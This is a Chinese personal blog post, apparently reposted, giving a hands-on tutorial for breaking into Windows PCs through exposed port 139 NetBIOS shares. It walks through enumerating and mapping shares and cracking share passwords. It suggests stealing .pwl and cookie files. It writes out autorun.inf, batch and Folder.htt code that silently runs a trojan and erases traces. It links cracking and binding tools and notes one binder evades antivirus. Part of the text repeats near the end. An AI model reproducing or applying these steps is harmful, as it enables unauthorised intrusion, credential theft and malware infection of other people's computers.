|
▼尐淘氣的天堂﹌莪不是天使!∷
 |
Blogs∷
|
Comments∷
|
Messages∷
|
Login∷
|
Links∷
|
|
▼尐淘氣的天堂﹌莪不是天使!∷
|
Blogs∷
|
Comments∷
|
Messages∷
|
Login∷
|
Links∷
|
如何利用139端口入侵个人电脑 2006-1-14 20:20:00 小淘气
如何利用139端口入侵个人电脑。139端口对应的是netbios协议。
在Windows构建的网络系统中,对每一台主机的唯一标识信息是它的NetBIOS名。系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名解析为相应IP地址,从而实现信息通讯。在这样的网络系统内部,利用NetBIOS名实现信息通讯是非常方便、快捷的。但是在Internet上,它就和一个后门程序差不多了。
看下网上流传很久用的139端口的进攻主法,这个方法实用性太小,几乎不太可能成功。用这个方法前,你要保证你机器里的有关tcp/ip和netbios协议要装齐。
第一步假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!如下图:
上图中的202.98.84.90就是我的IP地址,这个主机的名字是21,工作组是YB
第二步我们要做的是与对方计算机进行共享资源的连接
在这里我们需要用到两个NET命令,下面就是这两个命令的使用方法
NET VIEW?
作 用:显示域列表、计算机列表或指定计算机的共享资源列表。?
命令格式:net view [\\computername | /domain[:domainname]]?
参数介绍:?
<1>键入不带参数的net view显示当前域的计算机列表。?
<2>\\computername 指定要查看其共享资源的计算机。?
<3>/domain[:domainname]指定要查看其可用计算机的域?
NET USE?
作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
参数介绍:?
键入不带参数的net use列出网络连接。?
devicename指定要连接到的资源名称或要断开的设备名称。?
\\computername\sharename服务器及共享资源的名称。?
password访问共享资源的密码。?
*提示键入密码。 /user指定进行连接的另外一个用户。?
domainname指定另一个域。?
username指定登录的用户名。?
/home将用户连接到其宿主目录?
/delete取消指定网络连接。?
/persistent控制永久网络连接的使用。?
如上图所示,我们已经看到对方共享了他的C,D,E三个盘。对方只有完全共亨我们才能够进去。
第三步我们要做的是使用NBTSTAT命令载入NBT快取,如下图所示:我确实不知这步是什么意思,但我
们不做这步我们一样可以进去。
D:\>nbtstat –R<=载入NBT快取
D:\>nbtstat –c <=看有无载入NBT快取
上图中我用白色遮住的地方就是我已经得到的139端口漏洞的主机IP地址和用户名
第四步就该是我们进入他计算的时候了
我们要做的是点击开始---查找--计算机,将刚才找到的主机名字或ip输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上邻居一样.
第五步 利用139入侵windows98共享的办法
首先你要用到第一至四步的方法,找到该共享并能访问它(废话),然后再看情况:
1,要密码的话,先用netpass之类工具破了。(利用98共享密码校验漏洞,一瞬间就搞定)
2,如果是只读共享的,很遗憾,只有找找“敏感”的资料。
比如*.pwl文件(用cain破解)、cookie文件等。
3,完全共享的话就可以种木马了。但要让木马被运行,只有间接的办法:
a,绑定在常用程序上。用文件捆绑工具(比如exeBinder)就可以了。
b,直接把木马放到启动组里(如果能访问到的话)。
c,利用光盘自启动的原理,写个autorun.inf放在逻辑盘根目录下(没共享根目录就不行了),内容如下:
[autorun]
open=loadmuma.bat
再写个loadmuma.bat放在一起,内容是:
@echo off
del autorun.inf
muma.exe
del loadmuma.bat
注意:最后一行不要输回车、留空行,否则会留有cmd窗口报错。
muma.exe以木马的名字相应修改。
然后上传木马到同个目录。
等对方双击打开该逻辑盘,muma.exe就运行了,做的手脚也清除了。
d,利用Folder.htt模板的漏洞,在资源管理器里自定义那个共享文件夹。
在自定义向导要求编辑模板folder.htt时,在最后添加如代码:
<html>
<body>
<script>
setTimeout("f()",50);
function f() {
FileList.focus();
FileList.FocusedItem.InvokeVerb();
}
</script>
</body>
</html>
完成自定义。 (lcx注:这种方法是我从网上看来的,没有经过测试,代码我也不懂)
再把木马放在该文件夹里,将木马取名为!!!!.exe,其目的是要排在其他文件前面。
如果有子目录就不行了,因为目录总是排在文件前面。
当该文件夹被按web方式(默认的)打开时,自动执行第一个文件(就是木马啦)。
还可以参考上一种方法,写个!!!!.bat。
既运行木马,又清除痕迹。即删除自定义文件夹产生的folder.htt和desktop.ini,还有自己。
特别提醒:操作时将你的查看方式改为传统方式,以免自己先启动了木马。
(什么?你已经中了木马!那!@#$%^&*……)
e,还有就是用nimuda病毒的办法。发个改写过的nimuda病毒,让它启动木马。
考虑到杀毒软件的普及,这办法成功率很低,技术要求却比较高。
所以就不为新手细讲了。(其实是我也一知半解啦,呵呵)
相关工具:
NetPass 1.0 破解98共享密码 http://www.heibai.net/download/show.php?id=1465&down=1
cain v2.5 综合破解工具 http://www.heibai.net/download/show.php?id=2585&down=1
exeBinderZ 1.3 EXE捆绑机 (我用PE压了一下,暂时不会被杀了) http://www.v86.net/net/file/zzzevazzz/exeBinderZ1.3.zip
src="/ts/Article/UploadFiles/200502/20052795237660.gif" width=461>
D:\>nbtstat –R<=载入NBT快取
D:\>nbtstat –c <=看有无载入NBT快取
上图中我用白色遮住的地方就是我已经得到的139端口漏洞的主机IP地址和用户名
第四步就该是我们进入他计算的时候了
我们要做的是点击开始---查找--计算机,将刚才找到的主机名字或ip输入到上面
文章地址http://www.yangmi.net/hk/hd/xs/200502/8277.html
